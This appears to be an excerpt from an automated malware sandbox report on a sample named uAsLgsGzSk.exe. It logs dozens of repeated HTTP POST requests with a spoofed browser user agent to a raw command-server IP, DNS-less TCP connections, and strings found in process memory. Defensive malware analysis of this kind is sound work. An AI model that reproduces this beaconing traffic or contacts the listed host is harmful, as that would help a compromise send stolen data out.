                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.242
                                    Source: unknownHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.242
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi
                                    Source: powershell.exe, 0000001A.00000002.2818911280.0000020171E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                    Source: powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000374E000.00000004.00000800.00020000.00000000.sdmp, serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000001A.00000002.2801807600.0000020171A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                    Source: powershell.exe, 0000001A.00000002.2818911280.0000020171DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                                    Source: powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microP
                                    Source: powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microPackageManagementp
                                    Source: powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
